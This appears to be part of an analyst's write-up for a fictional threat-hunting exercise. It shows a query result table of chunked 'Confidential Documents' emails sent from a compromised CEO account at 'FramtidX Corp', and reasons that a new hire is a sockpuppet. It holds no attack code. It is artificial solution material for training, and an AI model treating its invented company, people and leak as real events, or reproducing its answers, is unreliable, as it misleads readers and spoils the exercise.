This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
sender timestamp reply_to recipient subject verdict link
ceo@framtidxdevcorp.com 2024-07-08 14:10:18.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [1] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 14:28:13.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [1] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 14:54:18.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [2] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 14:54:54.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [1] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 15:00:13.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [2] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 15:30:54.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [2] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 15:34:13.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [3] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 15:45:54.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [1] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 15:48:18.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [3] CLEAN
ceo@framtidxdevcorp.com 2024-07-08 15:51:54.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [2] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 10:03:39.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [4] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 10:59:39.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [5] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 11:55:39.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [6] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:10:39.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [7] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:30:42.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [3] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:32:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [3] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:37:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [4] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:40:39.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [8] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:45:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [5] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:48:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [6] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 12:55:44.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [4] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:00:42.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [4] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:08:44.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [5] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:31:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [7] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:37:39.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [9] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:38:42.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [5] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:40:44.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [6] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:42:44.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [7] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 13:43:44.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [8] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 14:02:44.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [9] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 14:06:39.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [10] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 14:14:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [8] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 14:23:00.0000 ceo@framtidxdevcorp.com nene.leaks@valdoriantimes.com Confidential Documents: Scandalous Emails Exposed on Mall Project!!!!! CLEAN
ceo@framtidxdevcorp.com 2024-07-09 14:25:42.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [6] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 14:42:44.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [10] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 15:08:42.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [7] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 15:12:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [9] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 15:14:58.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [10] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 15:30:42.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [8] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 15:33:42.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [9] CLEAN
ceo@framtidxdevcorp.com 2024-07-09 15:40:39.0000 ceo@framtidxdevcorp.com nene.leaks@valdoriantimes.com Confidential Documents: Scandalous Emails Exposed on Mall Project!!!!! CLEAN
ceo@framtidxdevcorp.com 2024-07-09 15:58:21.0000 ceo@framtidxdevcorp.com nene.leaks@valdoriantimes.com Confidential Documents: Scandalous Emails Exposed on Mall Project!!!!! CLEAN
ceo@framtidxdevcorp.com 2024-07-10 12:32:23.0000 ceo@framtidxdevcorp.com htuortwodahs@yopmail.com Confidential Documents: Email Chunk [10] CLEAN
ceo@framtidxdevcorp.com 2024-07-10 13:02:08.0000 ceo@framtidxdevcorp.com nene.leaks@valdoriantimes.com Confidential Documents: Scandalous Emails Exposed on Mall Project!!!!! CLEAN

Omitted from the results above are emails sent by server_admin@framtidxdevcorp.com, which turned out to be irrelevant. However, the address ceo@framtidxdevcorp.com--which very likely shared credentials with Johanna Karlsson's regular account--was used to send (multiple times, in duplicate) the email chunks (likely to avoid detection and/or bypass email attachment size limits). The threat actors sent the email chunks to themselves (htuortwodahs@yopmail.com), but sent the singular StolenEmails.zip directly to the Valdorian Times' Editorial Director Nene Leaks (nene.leaks@valdoriantimes.com).

The final loose end is Developer Alex Johnson; there are no hints that he was compromised in some way--he did not get any phishing emails before "he" compromised "his" coworkers, there are no signs of malware or otherwise suspicious software on his computer, etc.--and he was the latest, newest hire in FramtidX Corp., starting employment on 2024-05-01--not even two months before this spate of spearphishing attacks. "His" account activity is also odd; the earliest log-in to his corporate account is on 2024-06-16 with IP address 23.179.138.125 (not found anywhere else in FramtidX's logs), the external IP addresses associated with the threat actor (see [6]), and various internal IP addresses that correspond to "him" (10.10.0.2) and compromised FramtidX Corp. employees, starting on 2024-06-20 (and preceding their respective compromises): Marie Doty (10.10.0.69); Sofia Lindgren (10.10.0.18); Anita Bath (10.10.0.8); Erik Bjorn (10.10.0.3); and Jennifer Owens (10.10.0.72). No other employee has this pattern, having a single internal IP address (10.10.X.X) and one or two external IP addresses at most.

This points to Alex Johnson being a sockpuppet or an internal threat, though it might be the former as the threat actor's recon included FramtidX's careers page and hiring process (see [12]).

The threat actors targeted the two chief architects, the CEO and the webmaster; in order to accomplish their goal of impeding the construction of the mall--as discussed with and blessed by Valdoria Mayor Erik Stevens--they defaced the website, destroyed the plans, accessed the CEO's mailbox and leaked sensitive emails to the press.